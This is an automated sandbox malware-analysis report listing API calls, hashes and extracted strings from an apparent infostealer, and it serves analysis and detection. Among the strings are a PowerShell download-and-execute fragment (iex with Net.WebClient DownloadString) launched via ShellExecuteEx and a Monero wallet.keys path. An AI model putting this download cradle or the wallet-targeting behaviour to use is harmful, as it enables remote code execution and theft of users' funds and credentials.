                  • Instruction Fuzzy Hash: BBF03C75E54208BBDB10DFB0DC49B9E77F9AB48750F10C2A4F651AB2C0D670A6518B54
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002A99EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 002A9A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 002A9A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,002A148F,00000000), ref: 002A9A5A
                  • LocalFree.KERNEL32(002A148F), ref: 002A9A90
                  • CloseHandle.KERNEL32(000000FF), ref: 002A9A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: 5872a7c3c18f8a9d53c318d15af2de761d62d29e128c8a8b5fb93050e286d4bb
                  • Instruction ID: f44cffe2b71ee379fe407f3db2236ad2929749409f6ea4b9f9a9d58de531915f
                  • Opcode Fuzzy Hash: 5872a7c3c18f8a9d53c318d15af2de761d62d29e128c8a8b5fb93050e286d4bb
                  • Instruction Fuzzy Hash: 39316FB4A10209EFDF10CF95C885BEE77B5FF49340F108159E815AB291CB74A991CFA1
                  APIs
                  • lstrcat.KERNEL32(?,00D5F1D0), ref: 002B47DB
                    • Part of subcall function 002B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002B8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 002B4801
                  • lstrcat.KERNEL32(?,?), ref: 002B4820
                  • lstrcat.KERNEL32(?,?), ref: 002B4834
                  • lstrcat.KERNEL32(?,00D4A568), ref: 002B4847
                  • lstrcat.KERNEL32(?,?), ref: 002B485B
                  • lstrcat.KERNEL32(?,00D5E248), ref: 002B486F
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002B8D90: GetFileAttributesA.KERNEL32(00000000,?,002A1B54,?,?,002C564C,?,?,002C0E1F), ref: 002B8D9F
                    • Part of subcall function 002B4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 002B4580
                    • Part of subcall function 002B4570: RtlAllocateHeap.NTDLL(00000000), ref: 002B4587
                    • Part of subcall function 002B4570: wsprintfA.USER32 ref: 002B45A6
                    • Part of subcall function 002B4570: FindFirstFileA.KERNEL32(?,?), ref: 002B45BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: 2f92252cbed8e2a94045a6045426616b97f5ce54a101b6b0d69f7aac5f5e7818
                  • Instruction ID: 2dfd72f8084d367c982c315068f8d92c01be0f92c54c5152505ab58f5c2d4839
                  • Opcode Fuzzy Hash: 2f92252cbed8e2a94045a6045426616b97f5ce54a101b6b0d69f7aac5f5e7818
                  • Instruction Fuzzy Hash: F03193B6910208A7DB10FBB0DCC5EED737CBB58700F404599B31996082EE74A799CF96
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002B2D85
                  Strings
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 002B2CC4
                  • ')", xrefs: 002B2CB3
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 002B2D04
                  • <, xrefs: 002B2D39
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 21122b978b78c527ae74ef29c70e2baf44b3804e400427afa4e3be7473392a8b
                  • Instruction ID: 727972c371712d9aa2fdd3db4bbd5bab4a08d6268a3ff0d10d36fc5b8b07ddee
                  • Opcode Fuzzy Hash: 21122b978b78c527ae74ef29c70e2baf44b3804e400427afa4e3be7473392a8b
                  • Instruction Fuzzy Hash: 0641BE71C20208AADB18EFA0C8A2FDDB774AF14340F404119E116BA191DF746A5ACF91
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 002A9F41
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 1097e21edfca1ffebd4511f755c398c3f44ff73a46bf2fd6ec3ddcc1505d5c2e
                  • Instruction ID: e1e343fcb729fd35514798f0e82e363e846fb203eff0e138935214cf0aaf6557
                  • Opcode Fuzzy Hash: 1097e21edfca1ffebd4511f755c398c3f44ff73a46bf2fd6ec3ddcc1505d5c2e
                  • Instruction Fuzzy Hash: 57615B31A20248EBDB24EFA4CC96FED77B5AF41340F408518F90A5B191EF746A25CF92
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,00D5E2A8,00000000,00020119,?), ref: 002B40F4
                  • RegQueryValueExA.ADVAPI32(?,00D5F1B8,00000000,00000000,00000000,000000FF), ref: 002B4118
                  • RegCloseKey.ADVAPI32(?), ref: 002B4122
                  • lstrcat.KERNEL32(?,00000000), ref: 002B4147
                  • lstrcat.KERNEL32(?,00D5F2A8), ref: 002B415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValue
                  • String ID:
                  • API String ID: 690832082-0
                  • Opcode ID: 4b65d9d01d810212286bbe378e8979efe8f7a0e6cc0b48dca0732dc437387b68
                  • Instruction ID: dfd6e42853aae2e442e92ffba8b72915527cbbb2d341d46dc3e5e337be2262c8
                  • Opcode Fuzzy Hash: 4b65d9d01d810212286bbe378e8979efe8f7a0e6cc0b48dca0732dc437387b68
                  • Instruction Fuzzy Hash: BC418BB6D101086BDB14FBE0DC86FFD737DAB88300F404559B7155A182EE75ABA88F92
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B7E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B7E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,00D4B840,00000000,00020119,?), ref: 002B7E5E
                  • RegQueryValueExA.ADVAPI32(?,00D5E0C8,00000000,00000000,000000FF,000000FF), ref: 002B7E7F
                  • RegCloseKey.ADVAPI32(?), ref: 002B7E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 2d25018fef6e7e346f5726596f40eb2c0c1100dfd1de26afbd7836a0179889cd
                  • Instruction ID: 9d6c86d899f74a7a047de146f14c76eea887a950477b3f878d7259e9afe1d1bc
                  • Opcode Fuzzy Hash: 2d25018fef6e7e346f5726596f40eb2c0c1100dfd1de26afbd7836a0179889cd
                  • Instruction Fuzzy Hash: EA11A0B1A54245EFD700DF94DD89FBBBBB8FB44B00F104169F605AB281D7B4A8108BA2
                  APIs
                  • StrStrA.SHLWAPI(00D5F188,?,?,?,002B140C,?,00D5F188,00000000), ref: 002B926C
                  • lstrcpyn.KERNEL32(004EAB88,00D5F188,00D5F188,?,002B140C,?,00D5F188), ref: 002B9290
                  • lstrlen.KERNEL32(?,?,002B140C,?,00D5F188), ref: 002B92A7
                  • wsprintfA.USER32 ref: 002B92C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: 0fa0bcad93e45f70b279f7d3552ff400f6ed9c64905325ff58482a2ffc385c4f
                  • Instruction ID: baeb3ef09e18b774a8c38e5c22d8ffabdbd26ea401916c484a81281084b3471e
                  • Opcode Fuzzy Hash: 0fa0bcad93e45f70b279f7d3552ff400f6ed9c64905325ff58482a2ffc385c4f
                  • Instruction Fuzzy Hash: 1001C875500148FFCB04DFECC988EAE7BB9EF48355F108258FA099B205C675BA60DB96
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002A12B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002A12BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 002A12D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002A12F5
                  • RegCloseKey.ADVAPI32(?), ref: 002A12FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 792885e35e577c37e527addeeb65050b942ae8ef507d4bc5dc0e8508669f9345
                  • Instruction ID: 8e2c7ede48c852b911220f0e15d98d8b92a4954e70efc1cd8d75dc7eb2737e9f
                  • Opcode Fuzzy Hash: 792885e35e577c37e527addeeb65050b942ae8ef507d4bc5dc0e8508669f9345
                  • Instruction Fuzzy Hash: D80136B5A40208BBDB00DFD0DC89FAEB7B8FB48701F008155FA059B281D670AA158F55
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Type
                  • String ID:
                  • API String ID: 2109742289-3916222277
                  • Opcode ID: 1487f447a6624a1186626008a81aa4efc5a8d403cef6d2ff3fda71c096a33470
                  • Instruction ID: b3d906b74f64dd0f624259787ff74a83d81623586f444b1da915896011f85a76
                  • Opcode Fuzzy Hash: 1487f447a6624a1186626008a81aa4efc5a8d403cef6d2ff3fda71c096a33470
                  • Instruction Fuzzy Hash: 9C41E871510B9C9FEB228B24CC85FFB7BEC9F45744F2444E8E58A86182E2719A54DF60
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 002B6663
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002B6726
                  • ExitProcess.KERNEL32 ref: 002B6755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: 78daa1b299aceed6247396887c052aae5ba0dce36a637a5bd489ff1dfa1f0e93
                  • Instruction ID: 1deb403a698f425693697fb47d260da4e3a76db2f4d7404589605ad29d363fe4
                  • Opcode Fuzzy Hash: 78daa1b299aceed6247396887c052aae5ba0dce36a637a5bd489ff1dfa1f0e93
                  • Instruction Fuzzy Hash: 123127B1C11218AADB14EB90DC92BDEB77CAF04340F804199F31A66192DF746B58CF6A
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,002C0E28,00000000,?), ref: 002B882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B8836
                  • wsprintfA.USER32 ref: 002B8850
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: 8cf7365318bbf643cdd4278a1d447a553eb255a99a163a2f0ed781324e676730
                  • Instruction ID: 04d9ae5e4d8147f880aec7086c066a74e9ec81ad5ed1986126f608eb06184a6f
                  • Opcode Fuzzy Hash: 8cf7365318bbf643cdd4278a1d447a553eb255a99a163a2f0ed781324e676730
                  • Instruction Fuzzy Hash: F92145B1E50248AFDB04DFD4DD85FAEBBB8FB49701F104119F505AB281C779A910CBA5
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,002B951E,00000000), ref: 002B8D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B8D62
                  • wsprintfW.USER32 ref: 002B8D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: 8742170988ce6e5af36a1b740b5d1167a4f4b01aa927bc050e2f8a740e060c0b
                  • Instruction ID: 7da1bb342aab5636389389715a208ee407cca665eaa2bac75568a0d1d131cee9
                  • Opcode Fuzzy Hash: 8742170988ce6e5af36a1b740b5d1167a4f4b01aa927bc050e2f8a740e060c0b
                  • Instruction Fuzzy Hash: BDE08670A40208FBC700DB94DC49E597BB8EB04701F0041A4FD098B281D971AE208B56
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002B8B60: GetSystemTime.KERNEL32(002C0E1A,00D5EC80,002C05AE,?,?,002A13F9,?,0000001A,002C0E1A,00000000,?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002B8B86
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002AA2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 002AA3FF
                  • lstrlen.KERNEL32(00000000), ref: 002AA6BC
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 002AA743
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: ac5aa662b07a2aeeab6a7c635d33cabb8bc4df859f22c87b80a3a0dc2b656487
                  • Instruction ID: 69dd26aaa84107145a097d8110b1492757a244f777f055a7b4614de9e0929244
                  • Opcode Fuzzy Hash: ac5aa662b07a2aeeab6a7c635d33cabb8bc4df859f22c87b80a3a0dc2b656487
                  • Instruction Fuzzy Hash: 21E1D072820118ABDB15FBA4DC92EEE7338AF14340F508169F51776492EF306A69CF76
